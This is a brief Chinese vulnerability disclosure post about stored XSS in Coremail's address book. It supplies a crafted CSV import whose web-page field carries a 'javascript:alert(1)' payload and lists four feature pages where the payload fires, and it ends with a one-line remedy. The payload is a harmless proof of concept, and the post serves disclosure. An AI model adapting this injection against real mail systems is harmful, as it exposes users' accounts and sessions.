Coremail某功能多处存储型XSS漏洞-华盟网

Coremail某功能多处存储型XSS漏洞

华盟学院山东省第二期线下学习计划

coremail在个人通讯录处可以导入联系人,格式为csv。
Coremail某功能多处存储型XSS漏洞
导入如下CSV:

联系组,姓名,电子邮件地址,住宅地址,住宅地址 邮政编码,住宅电话,移动电话,单位,商务地址,商务地址 邮政编码,商务电话,商务传真,生日,即时信息地址,网页,__cm_group
aaaaaaa,,@qq.com,,,,13132132132,,,,,,19881212,,javascript:alert(1)
,,,,,,,,,,,,,,,FRIENDS=
,,,,,,,,,,,,,,,FAMILY=
,,,,,,,,,,,,,,,COWORKERS=
,,,,,,,,,,,,,,,NETFRIENDS=网友
,,,,,,,,,,,,,,,VIP=重要联系人

可见主页面已经转义了,没有触发:
Coremail某功能多处存储型XSS漏洞
但各个功能页面都存在触发的问题,列举如下:1.新建联系组时触发:
Coremail某功能多处存储型XSS漏洞
Coremail某功能多处存储型XSS漏洞
2.打印联系人时触发:
Coremail某功能多处存储型XSS漏洞
Coremail某功能多处存储型XSS漏洞
3.编辑组时触发:
Coremail某功能多处存储型XSS漏洞
Coremail某功能多处存储型XSS漏洞
4.清空联系人邮件时触发:
Coremail某功能多处存储型XSS漏洞
Coremail某功能多处存储型XSS漏洞

解决方案:

dom操作该过滤的过滤

www.idc126.com

原文地址:https://exploits.77169.com/2015/20150414023200.shtm

本文由 华盟网 作者:怪狗 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
0

发表评论